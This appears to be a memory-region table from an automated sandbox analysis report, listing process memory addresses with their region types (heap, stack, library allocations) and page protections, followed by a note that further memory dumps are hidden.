6DA3BE000
|
stack
|
page read and write
|
||
|
7F960000
|
trusted library allocation
|
page execute and read and write
|
||
|
74B0000
|
heap
|
page read and write
|
||
|
1E792851000
|
trusted library allocation
|
page read and write
|
||
|
6FD70000
|
unkown
|
page readonly
|
||
|
41BED7E000
|
stack
|
page read and write
|
||
|
4109000
|
trusted library allocation
|
page read and write
|
||
|
8050000
|
heap
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page read and write
|
||
|
6810000
|
heap
|
page execute and read and write
|
||
|
5318000
|
trusted library allocation
|
page read and write
|
||
|
14C3943F000
|
trusted library allocation
|
page read and write
|
||
|
6DF2000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
CF0000
|
direct allocation
|
page execute and read and write
|
||
|
14C39076000
|
heap
|
page read and write
|
||
|
880E000
|
stack
|
page read and write
|
||
|
1E7A2878000
|
trusted library allocation
|
page read and write
|
||
|
6E1C000
|
heap
|
page read and write
|
||
|
1AA88AD0000
|
heap
|
page read and write
|
||
|
6D9F3E000
|
stack
|
page read and write
|
||
|
6C6C5000
|
unkown
|
page write copy
|
||
|
14C373FB000
|
heap
|
page read and write
|
||
|
41BF94A000
|
stack
|
page read and write
|
||
|
870E000
|
stack
|
page read and write
|
||
|
2730000
|
direct allocation
|
page read and write
|
||
|
4863000
|
trusted library allocation
|
page read and write
|
||
|
725E000
|
stack
|
page read and write
|
||
|
B8C000
|
heap
|
page read and write
|
||
|
6AAB000
|
stack
|
page read and write
|
||
|
1E790874000
|
heap
|
page read and write
|
||
|
6E40000
|
heap
|
page read and write
|
||
|
7FFF445B0000
|
trusted library allocation
|
page read and write
|
||
|
6B9F000
|
stack
|
page read and write
|
||
|
7FFF44274000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
4865000
|
trusted library allocation
|
page read and write
|
||
|
6DA1BD000
|
stack
|
page read and write
|
||
|
1E7A494E000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44490000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44580000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44470000
|
trusted library allocation
|
page read and write
|
||
|
8184000
|
heap
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
6DA43E000
|
stack
|
page read and write
|
||
|
C7D000
|
stack
|
page read and write
|
||
|
6C6CF000
|
unkown
|
page write copy
|
||
|
1AA88ACA000
|
heap
|
page read and write
|
||
|
1AA88AA0000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
1E79084C000
|
heap
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
7DF46C280000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AC000
|
stack
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
1E7907F9000
|
heap
|
page read and write
|
||
|
1AA88AAF000
|
heap
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
4190000
|
trusted library allocation
|
page execute and read and write
|
||
|
14C493D1000
|
trusted library allocation
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
8047000
|
trusted library allocation
|
page read and write
|
||
|
7FDD000
|
stack
|
page read and write
|
||
|
84B3000
|
trusted library allocation
|
page read and write
|
||
|
424E000
|
stack
|
page read and write
|
||
|
6A2B000
|
stack
|
page read and write
|
||
|
8180000
|
heap
|
page read and write
|
||
|
1952B8C000
|
stack
|
page read and write
|
||
|
1AA88FC0000
|
remote allocation
|
page read and write
|
||
|
6FE24000
|
unkown
|
page read and write
|
||
|
1AA88ACA000
|
heap
|
page read and write
|
||
|
868E000
|
stack
|
page read and write
|
||
|
1AA88B0B000
|
heap
|
page read and write
|
||
|
7FFF444E0000
|
trusted library allocation
|
page read and write
|
||
|
49A1000
|
trusted library allocation
|
page read and write
|
||
|
2750000
|
direct allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
1E7908E4000
|
heap
|
page read and write
|
||
|
2784EE28000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
596000
|
heap
|
page read and write
|
||
|
1E7A674E000
|
trusted library allocation
|
page read and write
|
||
|
41BE8FE000
|
stack
|
page read and write
|
||
|
7FFF44560000
|
trusted library allocation
|
page read and write
|
||
|
1AA88AAF000
|
heap
|
page read and write
|
||
|
822C000
|
heap
|
page read and write
|
||
|
41BE77D000
|
stack
|
page read and write
|
||
|
4125000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
888D000
|
stack
|
page read and write
|
||
|
14C514FD000
|
heap
|
page read and write
|
||
|
1E7930C6000
|
trusted library allocation
|
page read and write
|
||
|
41BE57D000
|
stack
|
page read and write
|
||
|
1AA88FB0000
|
unclassified section
|
page readonly
|
||
|
300F000
|
stack
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
8186000
|
heap
|
page read and write
|
||
|
6FE25000
|
unkown
|
page write copy
|
||
|
48D2000
|
trusted library allocation
|
page read and write
|
||
|
6FE24000
|
unkown
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
1AA890D0000
|
heap
|
page read and write
|
||
|
6DE8000
|
heap
|
page read and write
|
||
|
14C37730000
|
heap
|
page read and write
|
||
|
6DA13B000
|
stack
|
page read and write
|
||
|
6FE29000
|
unkown
|
page readonly
|
||
|
8120000
|
trusted library allocation
|
page read and write
|
||
|
6FD70000
|
unkown
|
page readonly
|
||
|
1E792365000
|
heap
|
page read and write
|
||
|
1E792220000
|
trusted library allocation
|
page read and write
|
||
|
1E790A40000
|
heap
|
page read and write
|
||
|
7FFF44500000
|
trusted library allocation
|
page read and write
|
||
|
6D9E3C000
|
stack
|
page read and write
|
||
|
41BEAFE000
|
stack
|
page read and write
|
||
|
7FFF44480000
|
trusted library allocation
|
page read and write
|
||
|
1E7A3F4E000
|
trusted library allocation
|
page read and write
|
||
|
6DA4BD000
|
stack
|
page read and write
|
||
|
1E7908CC000
|
heap
|
page read and write
|
||
|
14C515E6000
|
heap
|
page execute and read and write
|
||
|
7FFF44550000
|
trusted library allocation
|
page read and write
|
||
|
4995000
|
trusted library allocation
|
page read and write
|
||
|
704E000
|
stack
|
page read and write
|
||
|
47F5000
|
trusted library allocation
|
page read and write
|
||
|
6C6C6000
|
unkown
|
page read and write
|
||
|
6E03000
|
heap
|
page read and write
|
||
|
7FFF44520000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44320000
|
trusted library allocation
|
page read and write
|
||
|
1E790960000
|
heap
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
6D9D3E000
|
stack
|
page read and write
|
||
|
4180000
|
heap
|
page read and write
|
||
|
1AA88A80000
|
unclassified section
|
page readonly
|
||
|
1AA88950000
|
unclassified section
|
page readonly
|
||
|
6DA2BD000
|
stack
|
page read and write
|
||
|
6EA0000
|
heap
|
page execute and read and write
|
||
|
62CC000
|
stack
|
page read and write
|
||
|
6DAF4E000
|
stack
|
page read and write
|
||
|
1E790831000
|
heap
|
page read and write
|
||
|
739E000
|
stack
|
page read and write
|
||
|
7FFF44410000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44590000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
1AA88AD0000
|
heap
|
page read and write
|
||
|
1E792FBC000
|
trusted library allocation
|
page read and write
|
||
|
14C5152A000
|
heap
|
page read and write
|
||
|
2791000
|
direct allocation
|
page read and write
|
||
|
14C51AB0000
|
heap
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
14C398AE000
|
trusted library allocation
|
page read and write
|
||
|
14C3746C000
|
heap
|
page read and write
|
||
|
4861000
|
trusted library allocation
|
page read and write
|
||
|
1E792840000
|
heap
|
page read and write
|
||
|
49DD000
|
trusted library allocation
|
page read and write
|
||
|
4922000
|
trusted library allocation
|
page read and write
|
||
|
818E000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
4122000
|
trusted library allocation
|
page read and write
|
||
|
4287000
|
heap
|
page read and write
|
||
|
41BE7F9000
|
stack
|
page read and write
|
||
|
14C397BF000
|
trusted library allocation
|
page read and write
|
||
|
6DA23A000
|
stack
|
page read and write
|
||
|
4B8000
|
heap
|
page read and write
|
||
|
1AA88F40000
|
heap
|
page read and write
|
||
|
7FFF44290000
|
trusted library allocation
|
page read and write
|
||
|
2CA4000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DF6000
|
heap
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
88831FE000
|
stack
|
page read and write
|
||
|
81B8000
|
heap
|
page read and write
|
||
|
840000
|
trusted library section
|
page read and write
|
||
|
2721000
|
direct allocation
|
page read and write
|
||
|
81CC000
|
heap
|
page read and write
|
||
|
1E7A2B4E000
|
trusted library allocation
|
page read and write
|
||
|
41BE37E000
|
stack
|
page read and write
|
||
|
41BFA4E000
|
stack
|
page read and write
|
||
|
41BFACC000
|
stack
|
page read and write
|
||
|
7FFF44530000
|
trusted library allocation
|
page read and write
|
||
|
4280000
|
heap
|
page read and write
|
||
|
888307C000
|
stack
|
page read and write
|
||
|
6C6C2000
|
unkown
|
page read and write
|
||
|
69AA000
|
stack
|
page read and write
|
||
|
14C373DF000
|
heap
|
page read and write
|
||
|
4291000
|
trusted library allocation
|
page read and write
|
||
|
1E790879000
|
heap
|
page read and write
|
||
|
41BEBFD000
|
stack
|
page read and write
|
||
|
6D98FE000
|
stack
|
page read and write
|
||
|
273F000
|
direct allocation
|
page read and write
|
||
|
14C515A2000
|
heap
|
page read and write
|
||
|
41BEDFC000
|
stack
|
page read and write
|
||
|
1AA88B24000
|
heap
|
page read and write
|
||
|
1E7A2880000
|
trusted library allocation
|
page read and write
|
||
|
1E790837000
|
heap
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
1AA88B90000
|
heap
|
page read and write
|
||
|
1AA88B0B000
|
heap
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
6BF000
|
unkown
|
page read and write
|
||
|
14C51760000
|
heap
|
page read and write
|
||
|
7FFF4427D000
|
trusted library allocation
|
page execute and read and write
|
||
|
81F2000
|
heap
|
page read and write
|
||
|
6A6E000
|
stack
|
page read and write
|
||
|
14C5182D000
|
heap
|
page read and write
|
||
|
14C516F0000
|
heap
|
page execute and read and write
|
||
|
47CD000
|
trusted library allocation
|
page read and write
|
||
|
14C4942D000
|
trusted library allocation
|
page read and write
|
||
|
6FE29000
|
unkown
|
page readonly
|
||
|
1E7926B6000
|
heap
|
page read and write
|
||
|
66CE000
|
stack
|
page read and write
|
||
|
2D5D000
|
stack
|
page read and write
|
||
|
1AA88A90000
|
heap
|
page read and write
|
||
|
14C37428000
|
heap
|
page read and write
|
||
|
1AA88FC0000
|
remote allocation
|
page read and write
|
||
|
AE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
73E000
|
stack
|
page read and write
|
||
|
44D000
|
stack
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
6C6D1000
|
unkown
|
page read and write
|
||
|
1AA88B24000
|
heap
|
page read and write
|
||
|
4984000
|
trusted library allocation
|
page read and write
|
||
|
2784F154000
|
heap
|
page read and write
|
||
|
1E7A354E000
|
trusted library allocation
|
page read and write
|
||
|
14C493C1000
|
trusted library allocation
|
page read and write
|
||
|
14C515E0000
|
heap
|
page execute and read and write
|
||
|
6D9873000
|
stack
|
page read and write
|
||
|
1AA88940000
|
heap
|
page read and write
|
||
|
731E000
|
stack
|
page read and write
|
||
|
1E792360000
|
heap
|
page read and write
|
||
|
ACD000
|
stack
|
page read and write
|
||
|
1E7A28C5000
|
trusted library allocation
|
page read and write
|
||
|
2774000
|
direct allocation
|
page read and write
|
||
|
41BEE7E000
|
stack
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
14C37660000
|
trusted library allocation
|
page read and write
|
||
|
41BE6F7000
|
stack
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
2719000
|
direct allocation
|
page read and write
|
||
|
696E000
|
stack
|
page read and write
|
||
|
6D9DB7000
|
stack
|
page read and write
|
||
|
1E7908F0000
|
heap
|
page read and write
|
||
|
14C373A9000
|
heap
|
page read and write
|
||
|
14C513CE000
|
heap
|
page read and write
|
||
|
41BE9FB000
|
stack
|
page read and write
|
||
|
275F000
|
direct allocation
|
page read and write
|
||
|
1E7A8F4E000
|
trusted library allocation
|
page read and write
|
||
|
14C38F10000
|
trusted library allocation
|
page read and write
|
||
|
1AA88AD0000
|
heap
|
page read and write
|
||
|
1AA88B25000
|
heap
|
page read and write
|
||
|
1E79083D000
|
heap
|
page read and write
|
||
|
A85000
|
heap
|
page read and write
|
||
|
2784EE43000
|
heap
|
page read and write
|
||
|
896E000
|
stack
|
page read and write
|
||
|
7FFF444D0000
|
trusted library allocation
|
page read and write
|
||
|
1E790650000
|
heap
|
page read and write
|
||
|
1E7A2B3F000
|
trusted library allocation
|
page read and write
|
||
|
5299000
|
trusted library allocation
|
page read and write
|
||
|
D02000
|
unkown
|
page readonly
|
||
|
86CE000
|
stack
|
page read and write
|
||
|
AE4000
|
trusted library allocation
|
page read and write
|
||
|
67CE000
|
stack
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
1E790A45000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
14C39070000
|
heap
|
page read and write
|
||
|
1AA88AD0000
|
heap
|
page read and write
|
||
|
6C52000
|
heap
|
page read and write
|
||
|
7FFF44440000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AA88AD1000
|
heap
|
page read and write
|
||
|
69EE000
|
stack
|
page read and write
|
||
|
41BE3FE000
|
stack
|
page read and write
|
||
|
6D9CF9000
|
stack
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
1E7A2851000
|
trusted library allocation
|
page read and write
|
||
|
41BEAF7000
|
stack
|
page read and write
|
||
|
8239000
|
heap
|
page read and write
|
||
|
19530FF000
|
stack
|
page read and write
|
||
|
1E79083B000
|
heap
|
page read and write
|
||
|
7FFF44460000
|
trusted library allocation
|
page execute and read and write
|
||
|
14C51610000
|
heap
|
page read and write
|
||
|
6FE26000
|
unkown
|
page write copy
|
||
|
8264000
|
heap
|
page read and write
|
||
|
830000
|
trusted library section
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
6DA5000
|
heap
|
page read and write
|
||
|
41BE47D000
|
stack
|
page read and write
|
||
|
1E790839000
|
heap
|
page read and write
|
||
|
749E000
|
stack
|
page read and write
|
||
|
2FBE000
|
stack
|
page read and write
|
||
|
7FFF4428B000
|
trusted library allocation
|
page read and write
|
||
|
14C51807000
|
heap
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
47D1000
|
trusted library allocation
|
page read and write
|
||
|
41BEC7B000
|
stack
|
page read and write
|
||
|
4990000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
2784EF20000
|
heap
|
page read and write
|
||
|
1E7908E2000
|
heap
|
page read and write
|
||
|
7FFF44330000
|
trusted library allocation
|
page execute and read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
14C373DB000
|
heap
|
page read and write
|
||
|
2784EE20000
|
heap
|
page read and write
|
||
|
14C37680000
|
trusted library allocation
|
page read and write
|
||
|
AD0000
|
trusted library allocation
|
page read and write
|
||
|
6DAECE000
|
stack
|
page read and write
|
||
|
41BDFA3000
|
stack
|
page read and write
|
||
|
26F7000
|
direct allocation
|
page read and write
|
||
|
1AA88FC0000
|
remote allocation
|
page read and write
|
||
|
41BE5FD000
|
stack
|
page read and write
|
||
|
4869000
|
trusted library allocation
|
page read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
7FFF44390000
|
trusted library allocation
|
page execute and read and write
|
||
|
14C373A0000
|
heap
|
page read and write
|
||
|
7B7000
|
stack
|
page read and write
|
||
|
6C6CB000
|
unkown
|
page read and write
|
||
|
41BE4FE000
|
stack
|
page read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page execute and read and write
|
||
|
14C37465000
|
heap
|
page read and write
|
||
|
678E000
|
stack
|
page read and write
|
||
|
14C517CD000
|
heap
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
D01000
|
unkown
|
page execute read
|
||
|
D01000
|
unkown
|
page execute read
|
||
|
692E000
|
stack
|
page read and write
|
||
|
8382000
|
trusted library allocation
|
page read and write
|
||
|
14C39990000
|
trusted library allocation
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
804A000
|
trusted library allocation
|
page read and write
|
||
|
6D9AFD000
|
stack
|
page read and write
|
||
|
462F000
|
trusted library allocation
|
page read and write
|
||
|
680D000
|
stack
|
page read and write
|
||
|
7078000
|
heap
|
page read and write
|
||
|
1E7922B0000
|
trusted library allocation
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
6815000
|
heap
|
page execute and read and write
|
||
|
593000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
5382000
|
trusted library allocation
|
page read and write
|
||
|
26ED000
|
direct allocation
|
page read and write
|
||
|
2798000
|
direct allocation
|
page read and write
|
||
|
B71000
|
heap
|
page read and write
|
||
|
41BECFC000
|
stack
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
14C517C2000
|
heap
|
page read and write
|
||
|
2729000
|
direct allocation
|
page read and write
|
||
|
68AB000
|
stack
|
page read and write
|
||
|
874E000
|
stack
|
page read and write
|
||
|
1AA88AB1000
|
heap
|
page read and write
|
||
|
14C373E7000
|
heap
|
page read and write
|
||
|
8283000
|
heap
|
page read and write
|
||
|
7FFF44510000
|
trusted library allocation
|
page read and write
|
||
|
D04000
|
unkown
|
page readonly
|
||
|
2784ECA0000
|
heap
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
D02000
|
unkown
|
page read and write
|
||
|
41BE27E000
|
stack
|
page read and write
|
||
|
2784EF90000
|
heap
|
page read and write
|
||
|
6D9A7E000
|
stack
|
page read and write
|
||
|
6D9B7F000
|
stack
|
page read and write
|
||
|
309D000
|
stack
|
page read and write
|
||
|
6FD71000
|
unkown
|
page execute read
|
||
|
420E000
|
stack
|
page read and write
|
||
|
6FED000
|
stack
|
page read and write
|
||
|
858000
|
heap
|
page read and write
|
||
|
D04000
|
unkown
|
page readonly
|
||
|
4100000
|
trusted library allocation
|
page read and write
|
||
|
6FD71000
|
unkown
|
page execute read
|
||
|
668E000
|
stack
|
page read and write
|
||
|
6C6D2000
|
unkown
|
page readonly
|
||
|
1E7A2876000
|
trusted library allocation
|
page read and write
|
||
|
7F978000
|
trusted library allocation
|
page execute and read and write
|
||
|
26FF000
|
direct allocation
|
page read and write
|
||
|
4110000
|
trusted library allocation
|
page read and write
|
||
|
6E0C000
|
heap
|
page read and write
|
||
|
14C37423000
|
heap
|
page read and write
|
||
|
4150000
|
heap
|
page readonly
|
||
|
735E000
|
stack
|
page read and write
|
||
|
6D9FBE000
|
stack
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
6E06000
|
heap
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
630C000
|
stack
|
page read and write
|
||
|
41BFBCE000
|
stack
|
page read and write
|
||
|
5291000
|
trusted library allocation
|
page read and write
|
||
|
14C37690000
|
heap
|
page readonly
|
||
|
14C37260000
|
heap
|
page read and write
|
||
|
8450000
|
trusted library allocation
|
page read and write
|
||
|
6DA33D000
|
stack
|
page read and write
|
||
|
1E7907F0000
|
heap
|
page read and write
|
||
|
7FFF44540000
|
trusted library allocation
|
page read and write
|
||
|
6D99FE000
|
stack
|
page read and write
|
||
|
1E7928D8000
|
trusted library allocation
|
page read and write
|
There are 593 hidden memdumps, click here to show them.